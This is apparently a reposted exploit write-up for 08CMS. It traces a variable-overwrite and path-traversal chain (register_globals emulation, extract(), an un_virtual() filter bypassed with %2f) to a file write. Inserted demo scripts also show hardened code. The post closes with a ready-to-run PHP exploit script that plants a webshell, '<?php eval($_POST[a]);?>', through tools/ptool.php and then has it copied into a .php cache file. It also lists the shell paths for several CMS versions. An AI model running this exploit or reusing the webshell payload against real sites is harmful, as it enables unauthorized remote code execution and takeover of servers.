Getshell and other problems caused by 08CMS variable Overwrite

Source: Internet
Author: User

I am also a beginner, so if I have got any of the PHP wrong I hope you will point out the mistake...

include/general.inc.php, lines 21-26:

    (isset($_REQUEST['GLOBALS']) || isset($_FILES['GLOBALS'])) && exit('08cms Error');
    if(!QUOTES_GPC && $_FILES) $_FILES = maddslashes($_FILES);
    foreach(array('_GET','_POST') as $_request){
        foreach($$_request as $k => $v){
            $k{0} != '_' && $$k = maddslashes($v);   // every request key not starting with '_' becomes a global
        }
    }
This is convenient to write (it emulates register_globals), but it also means that any variable a script uses without initializing it can simply be supplied by us in the request. Let's take a look at index.php.
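As an added example (not 08CMS's code), here is that loop run stand-alone against a constructed $_GET, with a recursive addslashes() standing in for maddslashes(), which is an assumption since the real function is not pasted on this page. It shows that a variable the script never initializes (such as $aid, which tools/ptool.php writes into a file) is simply created from the request, why a payload without quotes survives the escaping, and the explicit read-and-cast the code should have done instead. The file write is simulated with a temp file.

```php
<?php
// Added example, not 08CMS code: the general.inc.php loop run stand-alone against a
// constructed request, to show how an uninitialized global becomes attacker-controlled.

// Assumption: maddslashes() is a recursive addslashes(); the real one is not on the page.
function maddslashes($v) {
    return is_array($v) ? array_map('maddslashes', $v) : addslashes($v);
}

// Constructed request: what tools/ptool.php?aid=... would deliver.
$_GET = array(
    'aid'     => '<?php eval($_POST[a]);?>',    // no quotes, so addslashes() leaves it intact
    'aid2'    => "<?php eval(\$_POST['a']);?>", // the quotes get backslashed, so this is broken as PHP
    '_secret' => 'skipped',                      // leading underscore: the loop ignores it
);
$_POST = array();

// The 08CMS loop (written with $k[0]: the original's $k{0} syntax was removed in PHP 8).
(isset($_REQUEST['GLOBALS']) || isset($_FILES['GLOBALS'])) && exit('08cms Error');
foreach (array('_GET', '_POST') as $_request) {
    foreach ($$_request as $k => $v) {
        $k[0] != '_' && $$k = maddslashes($v);
    }
}

var_dump(isset($aid));      // nothing in this script initialized $aid, yet it now exists
echo $aid, "\n";            // the unquoted payload, unchanged
echo $aid2, "\n";           // the quoted payload, with backslashes inserted
var_dump(isset($_secret));  // the underscore key was not turned into a global

// What ptool.php does next, with a temp file standing in for dynamic/stats/aclicks.cac.
$cf = tempnam(sys_get_temp_dir(), 'aclicks');
if (@$fp = fopen($cf, 'a')) {
    fwrite($fp, "$aid\n");
    fclose($fp);
}
echo file_get_contents($cf);   // the "statistics" file now carries a PHP open tag
unlink($cf);

// Hardened: do not emulate register_globals; read the parameter explicitly and cast it.
$aid_safe = isset($_GET['aid']) ? (int)$_GET['aid'] : 0;
var_dump($aid_safe);           // a click id is an integer; the payload casts to 0
```

Run it with php on the command line. The point of the aid2 entry is the one the exp in this post relies on: maddslashes() only escapes quotes, so `$_POST[a]` written without quotes reaches the file exactly as sent.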
index.php:

    include_once dirname(__FILE__).'/include/general.inc.php';
    include_once M_ROOT.'./include/common.fun.php';
    if_siteclosed();
    mobile_open() || message('mobile phone version not open');
    parse_str(un_virtual($_SERVER['QUERY_STRING']), $temparr);

Let's look at this code. $_SERVER['QUERY_STRING'] holds the raw query string: for xx.php?id=222 it is id=222. It is passed through un_virtual(), which is meant to filter the query string. The relevant part of that function:

    function un_virtual($str){
        // ...
        $str = str_replace(array('/','-'), array('&','='), $str);   // replace / with & and - with =
        // ...
        return $str;
    }

parse_str() then parses the query string into variables and stores them in the array $temparr. A little further down:

    $_da = array();
    if(!$cnstr){
        $tplname = $_ismobile ? $o_index_tpl : $hometpl;   // $tplname is defined here
        $_da['rss'] = $cms_abs.'rss.php';
        $_da += $temparr;                  // $_da = $_da + $temparr: only 'rss' is protected, everything else comes from the request
        unset($temparr);                   // destroy the variable
        extract($_da, EXTR_OVERWRITE);     // variable overwrite: we now control $tplname
        tpl_refresh($tplname);             // tpl_refresh() is where we want to use this, so let's see what it does
include/refresh.fun.php, line 2:

    function tpl_refresh($tplname){
        global $templatedir, $debugtag;
        $tdir = M_ROOT."template/$templatedir/";
        $cacf = $tdir.'pcache/'.$tplname.'.php';      // the .php suffix could of course also be cut off with a truncation
        if(file_exists($x = $tdir."function/utags.fun.php")) include_once $x;
        mmkdir($cacf, 0, 1);
        if($debugtag || !file_exists($cacf)){         // easy to get through
            $str = load_tpl($tplname);                // as the name says: returns the content of the opened file
            /* load_tpl, include/refresh.fun.php line 1137:
               $tpl = @file2str(M_ROOT."template/$templatedir/".$tplname);   // file2str opens the file; not pasted here
               $rt && $tpl = preg_replace("/\{tpl\\$(.+?)\}/ies", "rtagval('\\1','$rt')", $tpl);
               this filtering is no obstacle */
            $str = preg_replace("/<\\?(?!php\s|=|\s)/i", '<?=\'<?\'?>', $str);   // still no obstacle: "<?php " followed by a space is let through
            $str = preg_replace("/\<\!\-\{(.+?)\}\-\>/s", "{\\1}", $str);
            breplace($str, '');
            nreplace($str);
            quit_refresh_var();
            $str = tpl_basecode($str);                // the code above filters $str
            str2file($str, $cacf);                    // this is the file-write function; not pasted here
        }
        unset($str, $tdir, $cacf);
    }
With this we can write files, but there are still some restrictions:

    $cacf = $tdir.'pcache/'.$tplname.'.php';
    $str = load_tpl($tplname);
    $tpl = @file2str(M_ROOT."template/$templatedir/".$tplname);

What gets written to $cacf is the content of template/$templatedir/$tplname, so we need a file on the server whose content we control.
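As an added example (not 08CMS's code), the following script reproduces the index.php chain un_virtual() -> parse_str() -> extract(EXTR_OVERWRITE) -> the two paths tpl_refresh() uses, and runs it against a raw and a URL-encoded traversal payload, next to a hardened resolver. un_virtual() is reduced to the str_replace quoted on this page; M_ROOT, $templatedir and the default template name are made-up values; normalize_path() is a helper added here so the effective file system paths are visible.

```php
<?php
// Added example, not 08CMS code: the index.php chain un_virtual() -> parse_str() ->
// extract(EXTR_OVERWRITE) -> tpl_refresh() paths, run against a traversal payload.
// Assumptions: un_virtual() is reduced to the str_replace quoted on the page, and
// M_ROOT, $templatedir and the default template name are made-up values.
define('M_ROOT', '/var/www/08cms/');
$templatedir = 'default';

function un_virtual($str) {
    // Runs on the RAW query string, i.e. before any URL-decoding has happened.
    return str_replace(array('/', '-'), array('&', '='), $str);
}

// Helper added here: collapse "a/b/../c" into "a/c" so the effective path is visible.
function normalize_path($path) {
    $parts = array();
    foreach (explode('/', $path) as $p) {
        if ($p === '' || $p === '.') continue;
        if ($p === '..') { array_pop($parts); continue; }
        $parts[] = $p;
    }
    return '/' . implode('/', $parts);
}

// Vulnerable flow, as in index.php and tpl_refresh().
function resolve_template($query_string) {
    global $templatedir;
    $tplname = 'index.htm';                            // the value index.php sets before extract()
    parse_str(un_virtual($query_string), $temparr);   // parse_str() URL-decodes, turning %2f back into /
    $_da = array('rss' => 'rss.php');
    $_da += $temparr;                                  // + keeps 'rss', takes everything else from the request
    extract($_da, EXTR_OVERWRITE);                     // $tplname now comes from the request
    $tdir = M_ROOT . "template/$templatedir/";
    return array(
        'tplname' => $tplname,
        'read'    => normalize_path($tdir . $tplname),                      // what load_tpl() opens
        'write'   => normalize_path($tdir . 'pcache/' . $tplname . '.php'), // $cacf, what str2file() writes
    );
}

// Hardened flow: no extract() over request data, and the DECODED name must be a single file name.
function resolve_template_safe($query_string) {
    global $templatedir;
    parse_str(un_virtual($query_string), $temparr);
    $tplname = isset($temparr['tplname']) ? $temparr['tplname'] : 'index.htm';
    if (!preg_match('/^[A-Za-z0-9_]+\.htm$/', $tplname)) {   // no '/', no '..', no NUL byte
        return false;
    }
    return M_ROOT . "template/$templatedir/pcache/$tplname.php";
}

$payloads = array(
    'tplname=../../dynamic/stats/aclicks.cac',          // raw slashes: un_virtual() turns them into '&'
    'tplname=..%2f..%2fdynamic%2fstats%2faclicks.cac',  // encoded: passes un_virtual(), decoded by parse_str()
);
foreach ($payloads as $qs) {
    print_r(resolve_template($qs));
    var_dump(resolve_template_safe($qs));
}
```

For the raw payload the filter works: un_virtual() splits the value at every slash and $tplname ends up as just "..". For the encoded payload un_virtual() sees no slash at all, parse_str() decodes the %2f afterwards, the read path collapses to <M_ROOT>/dynamic/stats/aclicks.cac and the write path to <M_ROOT>/template/dynamic/stats/aclicks.cac.php, which is the URL the exp script in this post prints. The hardened resolver rejects both payloads; the important part is that it validates after decoding and never lets extract() touch request data.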
$tplname is controlled by us. One option is to upload an image to produce a file to read; another is to find some other place where a shell can be written, for example tools/ptool.php.
    $cf = M_ROOT.'./dynamic/stats/aclicks.cac';
    $ct = M_ROOT.'./dynamic/stats/aclicks_time.cac';
    /* omitted */
    if(@$fp = fopen($cf, 'a')){
        fwrite($fp, "$aid\n");
        fclose($fp);
    }

$aid is never initialized, so (through the register_globals emulation in general.inc.php) we can supply it ourselves: whatever we send as aid is appended to dynamic/stats/aclicks.cac. Now we have a file whose content we control and a file write, but one restriction remains: $tplname cannot escape the template directory, because of the filter at the beginning (parse_str(un_virtual($_SERVER['QUERY_STRING']), $temparr)), which turns every / into &. However, un_virtual() works on the raw query string and parse_str() URL-decodes afterwards, so one extra layer of URL encoding (%2f instead of /) passes un_virtual() untouched and is decoded back into / by parse_str() ~ This CMS still has plenty of other problems.. I wrote an exp for beginners; there may be mistakes in it:
    <?php
    /*
    car CMS 4.1 GBK:
      exp:   index.php?tplname=..%252f..%252fdynamic%252fstats%252faclicks.cac
      shell: /dynamic/tplcache/common/....dynamicstatsaclicks.cac.php
    decoration CMS:
      shell: /dynamic/stats/aclicks.cac.php
    */
    // step 1: tools/ptool.php appends $aid to dynamic/stats/aclicks.cac (aid = <?php eval($_POST[a]);?>)
    $exp  = '/tools/ptool.php?aid=%3C%3Fphp%20eval%28%24_POST%5Ba%5D%29%3B%3F%3E';
    // step 2: index.php with an overwritten $tplname makes tpl_refresh() copy that file into the template cache as .php
    $exp1 = '/index.php?tplname=..%2f..%2fdynamic%2fstats%2faclicks.cac';

    if($argc < 2){
        print_r("+---------------------------------------------------------------------------+\n"
              . "[+] php ".$argv[0]." [url]    www.08sec.com\n"
              . "+---------------------------------------------------------------------------+\n");
        exit;
    }
    error_reporting(E_ERROR);
    set_time_limit(0);
    $host = $argv[1];
    go($host);

    function go($host){
        global $exp, $exp1;
        $re = Send($host, $exp);
        stripos($re, "MySQL") > 0 ? Send($host, $exp) : "";   // retry once if the first hit produced a MySQL error
        $re = Send($host, $exp1);
        stripos($re, "aclicks.cac") > 0
            ? exit("+ Exploit Success!\r\n+ http://$host/template/dynamic/stats/aclicks.cac.php\r\n")
            : exit("- Exploit Failed!\n");
    }

    function Send($host, $url){
        $data  = "GET $url HTTP/1.1\r\n";
        $data .= "Host: $host\r\n";
        $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 2000) Opera 6.03 [en]\r\n";
        $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
        $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $data .= "Accept-Language: en-us\r\n";
        $data .= "Connection: Close\r\n\r\n";   // the empty line terminates the request headers
        $fp = @fsockopen($host, 80);
        if(!$fp){
            die("[-] Connect to host Error\r\n");
        }
        fwrite($fp, $data);
        $back = '';
        while(!feof($fp)){
            $back .= fread($fp, 1024);
        }
        fclose($fp);
        return $back;
    }
    ?>
Some versions need the slash encoded twice (%252f) because they already decode the query string once before un_virtual() sees it. Car CMS 4.1 GBK: exp index.php?tplname=..%252f..%252fdynamic%252fstats%252faclicks.cac, shell /dynamic/tplcache/common/....dynamicstatsaclicks.cac.php. Decoration CMS: shell /dynamic/stats/aclicks.cac.php. An HTML upload form is attached.

(08CMS comes in many versions; the one this article was tested against is the automotive 4.3 UTF-8 version.) Sorry... Finally, I refuse to cater to freeloaders!
